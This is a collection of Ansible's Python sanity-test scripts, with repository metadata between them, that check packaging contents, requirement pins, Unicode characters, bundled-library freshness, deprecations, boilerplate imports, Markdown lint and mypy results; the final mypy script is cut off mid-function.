def collect_sdist_files(complete_file_list: list[str]) -> list[str]:
"""Return a list of files which should be present in the sdist."""
ignore_patterns = (
'.azure-pipelines/*',
'.cherry_picker.toml',
'.git*',
'.mailmap',
'bin/*',
'changelogs/README.md',
'changelogs/config.yaml',
'changelogs/fragments/*',
'hacking/*',
)
sdist_files = [path for path in complete_file_list if not any(fnmatch.fnmatch(path, ignore) for ignore in ignore_patterns)]
egg_info = (
'PKG-INFO',
'SOURCES.txt',
'dependency_links.txt',
'entry_points.txt',
'requires.txt',
'top_level.txt',
)
sdist_files.append('PKG-INFO')
sdist_files.append('setup.cfg')
sdist_files.extend(f'ansible_core.egg-info/{name}' for name in egg_info)
return sdist_files
def collect_wheel_files(complete_file_list: list[str]) -> list[str]:
"""Return a list of files which should be present in the wheel."""
wheel_files = []
license_files = []
for path in complete_file_list:
if path.startswith('licenses/'):
license_files.append(os.path.relpath(path, 'licenses'))
if path.startswith('lib/ansible/'):
prefix = 'lib'
elif path.startswith('test/lib/ansible_test/'):
prefix = 'test/lib'
else:
continue
wheel_files.append(os.path.relpath(path, prefix))
dist_info = [
'COPYING',
'METADATA',
'RECORD',
'WHEEL',
'entry_points.txt',
'top_level.txt',
] + license_files
wheel_files.extend(f'ansible_core-{__version__}.dist-info/{name}' for name in dist_info)
return wheel_files
@contextlib.contextmanager
def clean_repository(complete_file_list: list[str]) -> t.Generator[str, None, None]:
"""Copy the files to a temporary directory and yield the path."""
directories = sorted(set(os.path.dirname(path) for path in complete_file_list))
directories.remove('')
with tempfile.TemporaryDirectory() as temp_dir:
for directory in directories:
os.makedirs(os.path.join(temp_dir, directory))
for path in complete_file_list:
shutil.copy2(path, os.path.join(temp_dir, path), follow_symlinks=False)
yield temp_dir
def build(source_dir: str, tmp_dir: str) -> tuple[pathlib.Path, pathlib.Path]:
"""Create a sdist and wheel."""
create = subprocess.run( # pylint: disable=subprocess-run-check
[sys.executable, '-m', 'build', '--outdir', tmp_dir],
stdin=subprocess.DEVNULL,
capture_output=True,
text=True,
cwd=source_dir,
)
if create.returncode != 0:
raise RuntimeError(f'build failed:\n{create.stderr}\n{create.stdout}')
tmp_dir_files = list(pathlib.Path(tmp_dir).iterdir())
if len(tmp_dir_files) != 2:
raise RuntimeError(f'build resulted in {len(tmp_dir_files)} items instead of 2')
sdist_path = [path for path in tmp_dir_files if path.suffix == '.gz'][0]
wheel_path = [path for path in tmp_dir_files if path.suffix == '.whl'][0]
return sdist_path, wheel_path
def list_sdist(path: pathlib.Path) -> list[str]:
"""Return a list of the files in the sdist."""
item: tarfile.TarInfo
with tarfile.open(path) as sdist:
paths = ['/'.join(pathlib.Path(item.path).parts[1:]) for item in sdist.getmembers() if not item.isdir()]
return paths
def list_wheel(path: pathlib.Path) -> list[str]:
"""Return a list of the files in the wheel."""
with zipfile.ZipFile(path) as wheel:
paths = [item.filename for item in wheel.filelist if not item.is_dir()]
return paths
def check_files(source: str, expected: list[str], actual: list[str]) -> list[str]:
"""Verify the expected files exist and no extra files exist."""
missing = sorted(set(expected) - set(actual))
extra = sorted(set(actual) - set(expected))
errors = (
[f'{path}: missing from {source}' for path in missing] +
[f'{path}: unexpected in {source}' for path in extra]
)
return errors
def main() -> None:
"""Main program entry point."""
complete_file_list = sys.argv[1:] or sys.stdin.read().splitlines()
python_version = '.'.join(map(str, sys.version_info[:2]))
python_min = os.environ['ANSIBLE_TEST_MIN_PYTHON']
python_max = os.environ['ANSIBLE_TEST_MAX_PYTHON']
if python_version == python_min:
use_upper_setuptools_version = False
elif python_version == python_max:
use_upper_setuptools_version = True
else:
raise RuntimeError(f'Python version {python_version} is neither the minimum {python_min} or the maximum {python_max}.')
errors = check_build(complete_file_list, use_upper_setuptools_version)
for error in errors:
print(error)
def set_setuptools_version(repo_dir: str, use_upper_version: bool) -> str:
pyproject_toml = pathlib.Path(repo_dir) / 'pyproject.toml'
current = pyproject_toml.read_text()
pattern = re.compile(r'^(?P<begin>requires = \["setuptools >= )(?P<lower>[^,]+)(?P<middle>, <= )(?P<upper>[^"]+)(?P<end>".*)$', re.MULTILINE)
match = pattern.search(current)
if not match:
raise RuntimeError(f"Unable to find the 'requires' entry in: {pyproject_toml}")
lower_version = match.group('lower')
upper_version = match.group('upper')
requested_version = upper_version if use_upper_version else lower_version
updated = pattern.sub(fr'\g<begin>{requested_version}\g<middle>{requested_version}\g<end>', current)
if current == updated:
raise RuntimeError("Failed to set the setuptools version.")
pyproject_toml.write_text(updated)
return requested_version
def check_build(complete_file_list: list[str], use_upper_setuptools_version: bool) -> list[str]:
errors: list[str] = []
complete_file_list = list(complete_file_list) # avoid mutation of input
# Limit visible files to those reported by ansible-test.
# This avoids including files which are not committed to git.
with clean_repository(complete_file_list) as clean_repo_dir:
setuptools_version = set_setuptools_version(clean_repo_dir, use_upper_setuptools_version)
if __version__.endswith('.dev0'):
# Make sure a changelog exists for this version when testing from devel.
# When testing from a stable branch the changelog will already exist.
major_minor_version = '.'.join(__version__.split('.')[:2])
changelog_path = f'changelogs/CHANGELOG-v{major_minor_version}.rst'
pathlib.Path(clean_repo_dir, changelog_path).touch()
complete_file_list.append(changelog_path)
expected_sdist_files = collect_sdist_files(complete_file_list)
expected_wheel_files = collect_wheel_files(complete_file_list)
with tempfile.TemporaryDirectory() as tmp_dir:
sdist_path, wheel_path = build(clean_repo_dir, tmp_dir)
actual_sdist_files = list_sdist(sdist_path)
actual_wheel_files = list_wheel(wheel_path)
errors.extend(check_files('sdist', expected_sdist_files, actual_sdist_files))
errors.extend(check_files('wheel', expected_wheel_files, actual_wheel_files))
errors = [f'{msg} ({setuptools_version})' for msg in errors]
return errors
if __name__ == '__main__':
main()
| 7,756
|
Python
|
.py
| 169
| 39.12426
| 145
| 0.662633
|
ansible/ansible
| 62,258
| 23,791
| 861
|
GPL-3.0
|
9/5/2024, 5:11:58 PM (Europe/Amsterdam)
|
13,076
|
test-constraints.py
|
ansible_ansible/test/sanity/code-smell/test-constraints.py
|
from __future__ import annotations
import os
import pathlib
import re
import sys
def main():
constraints_path = 'test/lib/ansible_test/_data/requirements/constraints.txt'
requirements = {}
for path in sys.argv[1:] or sys.stdin.read().splitlines():
if path == 'test/lib/ansible_test/_data/requirements/ansible.txt':
# This file is an exact copy of the ansible requirements.txt and should not conflict with other constraints.
continue
with open(path, 'r') as path_fd:
requirements[path] = parse_requirements(path_fd.read().splitlines())
if path == 'test/lib/ansible_test/_data/requirements/ansible-test.txt':
# Special handling is required for ansible-test's requirements file.
check_ansible_test(path, requirements.pop(path))
continue
frozen_sanity = {}
non_sanity_requirements = set()
for path, requirements in requirements.items():
filename = os.path.basename(path)
is_sanity = filename.startswith('sanity.') or filename.endswith('.requirements.txt')
is_constraints = path == constraints_path
for lineno, line, requirement in requirements:
if not requirement:
print('%s:%d:%d: cannot parse requirement: %s' % (path, lineno, 1, line))
continue
name = requirement.group('name').lower()
raw_constraints = requirement.group('constraints')
constraints = raw_constraints.strip()
comment = requirement.group('comment')
is_pinned = re.search('^ *== *[0-9.]+(rc[0-9]+)?(\\.post[0-9]+)?$', constraints)
if is_sanity:
sanity = frozen_sanity.setdefault(name, [])
sanity.append((path, lineno, line, requirement))
elif not is_constraints:
non_sanity_requirements.add(name)
if is_sanity:
if not is_pinned:
# sanity test requirements must be pinned
print('%s:%d:%d: sanity test requirement (%s%s) must be frozen (use `==`)' % (path, lineno, 1, name, raw_constraints))
continue
if constraints and not is_constraints:
allow_constraints = 'sanity_ok' in comment
if not allow_constraints:
# keeping constraints for tests other than sanity tests in one file helps avoid conflicts
print('%s:%d:%d: put the constraint (%s%s) in `%s`' % (path, lineno, 1, name, raw_constraints, constraints_path))
def check_ansible_test(path: str, requirements: list[tuple[int, str, re.Match]]) -> None:
sys.path.insert(0, str(pathlib.Path(__file__).parent.parent.parent.joinpath('lib')))
from ansible_test._internal.coverage_util import COVERAGE_VERSIONS
from ansible_test._internal.util import version_to_str
expected_lines = set((
f"coverage == {item.coverage_version} ; python_version >= '{version_to_str(item.min_python)}' and python_version <= '{version_to_str(item.max_python)}'"
for item in COVERAGE_VERSIONS
))
for idx, requirement in enumerate(requirements):
lineno, line, match = requirement
if line in expected_lines:
expected_lines.remove(line)
continue
print('%s:%d:%d: unexpected line: %s' % (path, lineno, 1, line))
for expected_line in sorted(expected_lines):
print('%s:%d:%d: missing line: %s' % (path, requirements[-1][0] + 1, 1, expected_line))
def parse_requirements(lines):
# see https://www.python.org/dev/peps/pep-0508/#names
pattern = re.compile(r'^(?P<name>[A-Z0-9][A-Z0-9._-]*[A-Z0-9]|[A-Z0-9])(?P<extras> *\[[^]]*])?(?P<constraints>[^;#]*)(?P<markers>[^#]*)(?P<comment>.*)$',
re.IGNORECASE)
matches = [(lineno, line, pattern.search(line)) for lineno, line in enumerate(lines, start=1)]
requirements = []
for lineno, line, match in matches:
if not line.strip():
continue
if line.strip().startswith('#'):
continue
if line.startswith('git+https://'):
continue # hack to ignore git requirements
requirements.append((lineno, line, match))
return requirements
if __name__ == '__main__':
main()
| 4,330
|
Python
|
.py
| 81
| 43.160494
| 160
| 0.614764
|
ansible/ansible
| 62,258
| 23,791
| 861
|
GPL-3.0
|
9/5/2024, 5:11:58 PM (Europe/Amsterdam)
|
13,077
|
no-unwanted-characters.py
|
ansible_ansible/test/sanity/code-smell/no-unwanted-characters.py
|
"""Disallow use of unwanted Unicode characters."""
from __future__ import annotations
import re
import sys
def main():
"""Main entry point."""
for path in sys.argv[1:] or sys.stdin.read().splitlines():
with open(path, 'rb') as path_fd:
for line, text in enumerate(path_fd.readlines()):
try:
text = text.decode('utf-8')
except UnicodeDecodeError as ex:
print('%s:%d:%d: UnicodeDecodeError: %s' % (path, line + 1, ex.start + 1, ex))
continue
match = re.search('(\u00a0)', text)
if match:
print('%s:%d:%d: use an ASCII space instead of a Unicode no-break space' % (
path, line + 1, match.start(1) + 1))
if __name__ == '__main__':
main()
| 841
|
Python
|
.py
| 20
| 30.7
| 98
| 0.518428
|
ansible/ansible
| 62,258
| 23,791
| 861
|
GPL-3.0
|
9/5/2024, 5:11:58 PM (Europe/Amsterdam)
|
13,078
|
mypy.requirements.in
|
ansible_ansible/test/sanity/code-smell/mypy.requirements.in
|
mypy
cryptography # type stubs not published separately
jinja2 # type stubs not published separately
packaging # type stubs not published separately
pytest # type stubs not published separately
tomli # type stubs not published separately, required for toml inventory plugin
types-backports
types-paramiko
types-pyyaml
types-requests
types-setuptools # required for the pkg_resources import in the pip module
types-toml
| 425
|
Python
|
.py
| 12
| 34.416667
| 80
| 0.842615
|
ansible/ansible
| 62,258
| 23,791
| 861
|
GPL-3.0
|
9/5/2024, 5:11:58 PM (Europe/Amsterdam)
|
13,079
|
release-names.py
|
ansible_ansible/test/sanity/code-smell/release-names.py
|
# -*- coding: utf-8 -*-
# (c) 2019, Ansible Project
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
"""
Test that the release name is present in the list of used up release names
"""
from __future__ import annotations
import pathlib
from ansible.release import __codename__
def main():
"""Entrypoint to the script"""
releases = pathlib.Path('.github/RELEASE_NAMES.txt').read_text().splitlines()
# Why this format? The file's sole purpose is to be read by a human when they need to know
# which release names have already been used. So:
# 1) It's easier for a human to find the release names when there's one on each line
# 2) It helps keep other people from using the file and then asking for new features in it
for name in (r.split(maxsplit=1)[1] for r in releases):
if __codename__ == name:
break
else:
print(f'.github/RELEASE_NAMES.txt: Current codename {__codename__!r} not present in the file')
if __name__ == '__main__':
main()
| 1,616
|
Python
|
.py
| 37
| 40.675676
| 102
| 0.719567
|
ansible/ansible
| 62,258
| 23,791
| 861
|
GPL-3.0
|
9/5/2024, 5:11:58 PM (Europe/Amsterdam)
|
13,080
|
update-bundled.py
|
ansible_ansible/test/sanity/code-smell/update-bundled.py
|
# -*- coding: utf-8 -*-
# (c) 2018, Ansible Project
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
"""
This test checks whether the libraries we're bundling are out of date and need to be synced with
a newer upstream release.
"""
from __future__ import annotations
import fnmatch
import json
import re
import sys
from ansible.module_utils.compat.version import LooseVersion
import packaging.specifiers
from ansible.module_utils.urls import open_url
BUNDLED_RE = re.compile(b'\\b_BUNDLED_METADATA\\b')
def get_bundled_libs(paths):
"""
Return the set of known bundled libraries
:arg paths: The paths which the test has been instructed to check
:returns: The list of all files which we know to contain bundled libraries. If a bundled
library consists of multiple files, this should be the file which has metadata included.
"""
bundled_libs = set()
for filename in fnmatch.filter(paths, 'lib/ansible/compat/*/__init__.py'):
bundled_libs.add(filename)
bundled_libs.add('lib/ansible/module_utils/distro/__init__.py')
bundled_libs.add('lib/ansible/module_utils/six/__init__.py')
return bundled_libs
def get_files_with_bundled_metadata(paths):
"""
Search for any files which have bundled metadata inside of them
:arg paths: Iterable of filenames to search for metadata inside of
:returns: A set of pathnames which contained metadata
"""
with_metadata = set()
for path in paths:
with open(path, 'rb') as f:
body = f.read()
if BUNDLED_RE.search(body):
with_metadata.add(path)
return with_metadata
def get_bundled_metadata(filename):
"""
Retrieve the metadata about a bundled library from a python file
:arg filename: The filename to look inside for the metadata
:raises ValueError: If we're unable to extract metadata from the file
:returns: The metadata from the python file
"""
with open(filename, 'r') as module:
for line in module:
if line.strip().startswith('# NOT_BUNDLED'):
return None
if line.strip().startswith('# CANT_UPDATE'):
print(
'{0} marked as CANT_UPDATE, so skipping. Manual '
'check for CVEs required.'.format(filename))
return None
if line.strip().startswith('_BUNDLED_METADATA'):
data = line[line.index('{'):].strip()
break
else:
raise ValueError('Unable to check bundled library for update. Please add'
' _BUNDLED_METADATA dictionary to the library file with'
' information on pypi name and bundled version.')
metadata = json.loads(data)
return metadata
def get_latest_applicable_version(pypi_data, constraints=None):
"""Get the latest pypi version of the package that we allow
:arg pypi_data: Pypi information about the data as returned by
``https://pypi.org/pypi/{pkg_name}/json``
:kwarg constraints: version constraints on what we're allowed to use as specified by
the bundled metadata
:returns: The most recent version on pypi that are allowed by ``constraints``
"""
latest_version = "0"
if constraints:
version_specification = packaging.specifiers.SpecifierSet(constraints)
for version in pypi_data['releases']:
if version in version_specification:
if LooseVersion(version) > LooseVersion(latest_version):
latest_version = version
else:
latest_version = pypi_data['info']['version']
return latest_version
def main():
"""Entrypoint to the script"""
paths = sys.argv[1:] or sys.stdin.read().splitlines()
bundled_libs = get_bundled_libs(paths)
files_with_bundled_metadata = get_files_with_bundled_metadata(paths)
for filename in files_with_bundled_metadata.difference(bundled_libs):
if filename.startswith('test/support/'):
continue # bundled support code does not need to be updated or tracked
print('{0}: ERROR: File contains _BUNDLED_METADATA but needs to be added to'
' test/sanity/code-smell/update-bundled.py'.format(filename))
for filename in bundled_libs:
try:
metadata = get_bundled_metadata(filename)
except ValueError as e:
print('{0}: ERROR: {1}'.format(filename, e))
continue
except (IOError, OSError) as e:
if e.errno == 2:
print('{0}: ERROR: {1}. Perhaps the bundled library has been removed'
' or moved and the bundled library test needs to be modified as'
' well?'.format(filename, e))
if metadata is None:
continue
pypi_fh = open_url('https://pypi.org/pypi/{0}/json'.format(metadata['pypi_name']))
pypi_data = json.loads(pypi_fh.read().decode('utf-8'))
constraints = metadata.get('version_constraints', None)
latest_version = get_latest_applicable_version(pypi_data, constraints)
if LooseVersion(metadata['version']) < LooseVersion(latest_version):
print('{0}: UPDATE {1} from {2} to {3} {4}'.format(
filename,
metadata['pypi_name'],
metadata['version'],
latest_version,
'https://pypi.org/pypi/{0}/json'.format(metadata['pypi_name'])))
if __name__ == '__main__':
main()
| 6,141
|
Python
|
.py
| 135
| 37.614815
| 96
| 0.657895
|
ansible/ansible
| 62,258
| 23,791
| 861
|
GPL-3.0
|
9/5/2024, 5:11:58 PM (Europe/Amsterdam)
|
13,081
|
deprecated-config.py
|
ansible_ansible/test/sanity/code-smell/deprecated-config.py
|
# -*- coding: utf-8 -*-
# (c) 2018, Matt Martz <matt@sivel.net>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import annotations
import mmap
import os
import re
import sys
from ansible.module_utils.compat.version import StrictVersion
import yaml
import ansible.config
from ansible.plugins.loader import fragment_loader
from ansible.release import __version__ as ansible_version
from ansible.utils.plugin_docs import get_docstring
DOC_RE = re.compile(b'^DOCUMENTATION', flags=re.M)
ANSIBLE_MAJOR = StrictVersion('.'.join(ansible_version.split('.')[:2]))
def find_deprecations(obj, path=None):
if not isinstance(obj, (list, dict)):
return
try:
items = obj.items()
except AttributeError:
items = enumerate(obj)
for key, value in items:
if path is None:
this_path = []
else:
this_path = path[:]
this_path.append(key)
if key != 'deprecated':
yield from find_deprecations(value, path=this_path)
else:
try:
version = value['version']
this_path.append('version')
except KeyError:
version = value['removed_in']
this_path.append('removed_in')
if StrictVersion(version) <= ANSIBLE_MAJOR:
yield (this_path, version)
def main():
plugins = []
for path in sys.argv[1:] or sys.stdin.read().splitlines():
with open(path, 'rb') as f:
try:
mm_file = mmap.mmap(f.fileno(), 0, access=mmap.ACCESS_READ)
except ValueError:
continue
if DOC_RE.search(mm_file):
plugins.append(path)
mm_file.close()
for plugin in plugins:
data = {}
data['doc'], data['examples'], data['return'], data['metadata'] = get_docstring(plugin, fragment_loader)
for result in find_deprecations(data['doc']):
print(
'%s: %s is scheduled for removal in %s' % (plugin, '.'.join(str(i) for i in result[0][:-2]), result[1])
)
base = os.path.join(os.path.dirname(ansible.config.__file__), 'base.yml')
root_path = os.path.dirname(os.path.dirname(os.path.dirname(ansible.__file__)))
relative_base = os.path.relpath(base, root_path)
with open(base) as f:
data = yaml.safe_load(f)
for result in find_deprecations(data):
print('%s: %s is scheduled for removal in %s' % (relative_base, '.'.join(str(i) for i in result[0][:-2]), result[1]))
if __name__ == '__main__':
main()
| 3,208
|
Python
|
.py
| 81
| 32.765432
| 125
| 0.636832
|
ansible/ansible
| 62,258
| 23,791
| 861
|
GPL-3.0
|
9/5/2024, 5:11:58 PM (Europe/Amsterdam)
|
13,082
|
required-and-default-attributes.py
|
ansible_ansible/test/sanity/code-smell/required-and-default-attributes.py
|
from __future__ import annotations
import re
import sys
def main():
for path in sys.argv[1:] or sys.stdin.read().splitlines():
with open(path, 'r') as path_fd:
for line, text in enumerate(path_fd.readlines()):
match = re.search(r'(FieldAttribute.*(default|required).*(default|required))', text)
if match:
print('%s:%d:%d: use only one of `default` or `required` with `FieldAttribute`' % (
path, line + 1, match.start(1) + 1))
if __name__ == '__main__':
main()
| 570
|
Python
|
.py
| 13
| 34.384615
| 103
| 0.560799
|
ansible/ansible
| 62,258
| 23,791
| 861
|
GPL-3.0
|
9/5/2024, 5:11:58 PM (Europe/Amsterdam)
|
13,083
|
mypy.requirements.txt
|
ansible_ansible/test/sanity/code-smell/mypy.requirements.txt
|
# edit "mypy.requirements.in" and generate with: hacking/update-sanity-requirements.py --test mypy
cffi==1.17.1
cryptography==43.0.1
iniconfig==2.0.0
Jinja2==3.1.4
MarkupSafe==2.1.5
mypy==1.11.2
mypy-extensions==1.0.0
packaging==24.1
pluggy==1.5.0
pycparser==2.22
pytest==8.3.3
tomli==2.0.2
types-backports==0.1.3
types-paramiko==3.5.0.20240928
types-PyYAML==6.0.12.20240917
types-requests==2.32.0.20240914
types-setuptools==75.1.0.20240917
types-toml==0.10.8.20240310
typing_extensions==4.12.2
urllib3==2.2.3
| 510
|
Python
|
.py
| 21
| 23.285714
| 98
| 0.773006
|
ansible/ansible
| 62,258
| 23,791
| 861
|
GPL-3.0
|
9/5/2024, 5:11:58 PM (Europe/Amsterdam)
|
13,084
|
boilerplate.py
|
ansible_ansible/test/sanity/code-smell/boilerplate.py
|
from __future__ import annotations
import ast
import sys
def main():
for path in sys.argv[1:] or sys.stdin.read().splitlines():
with open(path, 'rb') as path_fd:
lines = path_fd.read().splitlines()
missing = True
if not lines:
# Files are allowed to be empty of everything including boilerplate
missing = False
invalid_future = []
for text in lines:
if text in (
b'from __future__ import annotations',
b'from __future__ import annotations as _annotations',
b'from __future__ import annotations # pragma: nocover',
):
missing = False
break
if text.strip().startswith(b'from __future__ ') or text.strip().startswith(b'__metaclass__ '):
invalid_future.append(text.decode())
if missing:
with open(path) as file:
contents = file.read()
# noinspection PyBroadException
try:
node = ast.parse(contents)
# files consisting of only assignments have no need for future import boilerplate
# the most likely case is that of a documentation only python file
if all(isinstance(statement, ast.Assign) for statement in node.body):
missing = False
except Exception: # pylint: disable=broad-except
pass # the compile sanity test will report this error
if missing:
print('%s: missing: from __future__ import annotations' % path)
for text in invalid_future:
print('%s: invalid: %s' % (path, text))
if __name__ == '__main__':
main()
| 1,756
|
Python
|
.py
| 40
| 31.85
| 106
| 0.562867
|
ansible/ansible
| 62,258
| 23,791
| 861
|
GPL-3.0
|
9/5/2024, 5:11:58 PM (Europe/Amsterdam)
|
13,085
|
no-unwanted-files.py
|
ansible_ansible/test/sanity/code-smell/no-unwanted-files.py
|
"""Prevent unwanted files from being added to the source tree."""
from __future__ import annotations
import os
import sys
def main():
"""Main entry point."""
paths = sys.argv[1:] or sys.stdin.read().splitlines()
allowed_extensions = (
'.cs',
'.ps1',
'.psm1',
'.py',
)
skip_paths = set([
'lib/ansible/config/ansible_builtin_runtime.yml', # not included in the sanity ignore file since it won't exist until after migration
])
skip_directories = (
'lib/ansible/galaxy/data/',
)
allow_yaml = ('lib/ansible/plugins/test', 'lib/ansible/plugins/filter')
for path in paths:
if path in skip_paths:
continue
if any(path.startswith(skip_directory) for skip_directory in skip_directories):
continue
if path.startswith('lib/') and not path.startswith('lib/ansible/'):
print('%s: all "lib" content must reside in the "lib/ansible" directory' % path)
continue
ext = os.path.splitext(path)[1]
if ext in ('.yml', ) and any(path.startswith(yaml_directory) for yaml_directory in allow_yaml):
continue
if ext not in allowed_extensions:
print('%s: extension must be one of: %s' % (path, ', '.join(allowed_extensions)))
if __name__ == '__main__':
main()
| 1,359
|
Python
|
.py
| 35
| 31.371429
| 142
| 0.614504
|
ansible/ansible
| 62,258
| 23,791
| 861
|
GPL-3.0
|
9/5/2024, 5:11:58 PM (Europe/Amsterdam)
|
13,086
|
obsolete-files.py
|
ansible_ansible/test/sanity/code-smell/obsolete-files.py
|
"""Prevent files from being added to directories that are now obsolete."""
from __future__ import annotations
import os
import sys
def main():
"""Main entry point."""
paths = sys.argv[1:] or sys.stdin.read().splitlines()
for path in paths:
print('%s: directory "%s/" is obsolete and should not contain any files' % (path, os.path.dirname(path)))
if __name__ == '__main__':
main()
| 410
|
Python
|
.py
| 11
| 33.545455
| 113
| 0.664122
|
ansible/ansible
| 62,258
| 23,791
| 861
|
GPL-3.0
|
9/5/2024, 5:11:58 PM (Europe/Amsterdam)
|
13,087
|
ansible-requirements.py
|
ansible_ansible/test/sanity/code-smell/ansible-requirements.py
|
from __future__ import annotations
import re
def read_file(path):
try:
with open(path, 'r') as f:
return f.read()
except Exception as ex: # pylint: disable=broad-except
print('%s:%d:%d: unable to read required file %s' % (path, 0, 0, re.sub(r'\s+', ' ', str(ex))))
return None
def main():
ORIGINAL_FILE = 'requirements.txt'
VENDORED_COPY = 'test/lib/ansible_test/_data/requirements/ansible.txt'
original_requirements = read_file(ORIGINAL_FILE)
vendored_requirements = read_file(VENDORED_COPY)
if original_requirements is not None and vendored_requirements is not None:
if original_requirements != vendored_requirements:
print('%s:%d:%d: must be identical to %s' % (VENDORED_COPY, 0, 0, ORIGINAL_FILE))
if __name__ == '__main__':
main()
| 834
|
Python
|
.py
| 19
| 37.789474
| 103
| 0.651365
|
ansible/ansible
| 62,258
| 23,791
| 861
|
GPL-3.0
|
9/5/2024, 5:11:58 PM (Europe/Amsterdam)
|
13,088
|
pymarkdown.py
|
ansible_ansible/test/sanity/code-smell/pymarkdown.py
|
"""Sanity test for Markdown files."""
from __future__ import annotations
import pathlib
import re
import subprocess
import sys
import typing as t
def main() -> None:
paths = sys.argv[1:] or sys.stdin.read().splitlines()
cmd = [
sys.executable,
'-m', 'pymarkdown',
'--config', pathlib.Path(__file__).parent / 'pymarkdown.config.json',
'--strict-config',
'scan',
] + paths
process = subprocess.run(
cmd,
stdin=subprocess.DEVNULL,
capture_output=True,
check=False,
text=True,
)
if process.stderr:
print(process.stderr.strip(), file=sys.stderr)
sys.exit(1)
if not (stdout := process.stdout.strip()):
return
pattern = re.compile(r'^(?P<path_line_column>[^:]*:[0-9]+:[0-9]+): (?P<code>[^:]*): (?P<message>.*) \((?P<aliases>.*)\)$')
matches = parse_to_list_of_dict(pattern, stdout)
results = [f"{match['path_line_column']}: {match['aliases'].split(', ')[0]}: {match['message']}" for match in matches]
print('\n'.join(results))
def parse_to_list_of_dict(pattern: re.Pattern, value: str) -> list[dict[str, t.Any]]:
matched = []
unmatched = []
for line in value.splitlines():
match = re.search(pattern, line)
if match:
matched.append(match.groupdict())
else:
unmatched.append(line)
if unmatched:
raise Exception(f'Pattern {pattern!r} did not match values:\n' + '\n'.join(unmatched))
return matched
if __name__ == '__main__':
main()
| 1,568
|
Python
|
.py
| 46
| 27.73913
| 126
| 0.595745
|
ansible/ansible
| 62,258
| 23,791
| 861
|
GPL-3.0
|
9/5/2024, 5:11:58 PM (Europe/Amsterdam)
|
13,089
|
mypy.json
|
ansible_ansible/test/sanity/code-smell/mypy.json
|
{
"prefixes": [
"lib/ansible/",
"test/lib/ansible_test/_internal/",
"packaging/",
"test/units",
"test/lib/ansible_test/_util/target/sanity/import/"
],
"extensions": [
".py"
],
"multi_version": "controller",
"error_code": "ansible-test",
"output": "path-line-column-code-message"
}
| 357
|
Python
|
.py
| 15
| 17.733333
| 59
| 0.546784
|
ansible/ansible
| 62,258
| 23,791
| 861
|
GPL-3.0
|
9/5/2024, 5:11:58 PM (Europe/Amsterdam)
|
13,090
|
mypy.py
|
ansible_ansible/test/sanity/code-smell/mypy.py
|
"""Sanity test which executes mypy."""
from __future__ import annotations
import dataclasses
import os
import pathlib
import re
import subprocess
import sys
import typing as t
vendored_paths = (
'lib/ansible/module_utils/six/__init__.py',
'lib/ansible/module_utils/distro/_distro.py',
)
config_dir = pathlib.Path(__file__).parent / 'mypy'
def main() -> None:
"""Main program entry point."""
paths = sys.argv[1:] or sys.stdin.read().splitlines()
paths = [path for path in paths if path not in vendored_paths] # FUTURE: define the exclusions in config so the paths can be skipped earlier
if not paths:
return
python_version = os.environ['ANSIBLE_TEST_TARGET_PYTHON_VERSION']
controller_python_versions = os.environ['ANSIBLE_TEST_CONTROLLER_PYTHON_VERSIONS'].split(',')
remote_only_python_versions = os.environ['ANSIBLE_TEST_REMOTE_ONLY_PYTHON_VERSIONS'].split(',')
contexts = (
MyPyContext('ansible-test', ['test/lib/ansible_test/_util/target/sanity/import/'], controller_python_versions),
MyPyContext('ansible-test', ['test/lib/ansible_test/_internal/'], controller_python_versions),
MyPyContext('ansible-core', ['lib/ansible/'], controller_python_versions),
MyPyContext('modules', ['lib/ansible/modules/', 'lib/ansible/module_utils/'], remote_only_python_versions),
MyPyContext('packaging', ['packaging/'], controller_python_versions),
MyPyContext('modules', ['test/units/modules/', 'test/units/module_utils/'], remote_only_python_versions),
MyPyContext('ansible-core', ['test/units/'], controller_python_versions),
)
unfiltered_messages: list[SanityMessage] = []
for context in contexts:
if python_version not in context.python_versions:
continue
unfiltered_messages.extend(test_context(python_version, context, paths))
notices = []
messages = []
for message in unfiltered_messages:
if message.level != 'error':
notices.append(message)
continue
match = re.search(r'^(?P<message>.*) {2}\[(?P<code>.*)]$', message.message)
messages.append(SanityMessage(
message=match.group('message'),
path=message.path,
line=message.line,
column=message.column,
level=message.level,
code=match.group('code'),
))
# FUTURE: provide a way for script based tests to report non-error messages (in this case, notices)
# The following error codes from mypy indicate that results are incomplete.
# That prevents the test from completing successfully, just as if mypy were to traceback or generate unexpected output.
fatal_error_codes = {
'import',
'syntax',
}
fatal_errors = [message for message in messages if message.code in fatal_error_codes]
if fatal_errors:
error_message = '\n'.join(error.format() for error in fatal_errors)
raise Exception(f'Encountered {len(fatal_errors)} fatal errors reported by mypy:\n{error_message}')
paths_set = set(paths)
# Only report messages for paths that were specified as targets.
# Imports in our code are followed by mypy in order to perform its analysis, which is important for accurate results.
# However, it will also report issues on those files, which is not the desired behavior.
messages = [message for message in messages if message.path in paths_set]
for message in messages:
print(message.format())
def test_context(
python_version: str,
context: MyPyContext,
paths: list[str],
) -> list[SanityMessage]:
"""Run mypy tests for the specified context."""
context_paths = [path for path in paths if any(path.startswith(match_path) for match_path in context.paths)]
if not context_paths:
return []
config_path = config_dir / f'{context.name}.ini'
# FUTURE: provide a way for script based tests to report progress and other diagnostic information
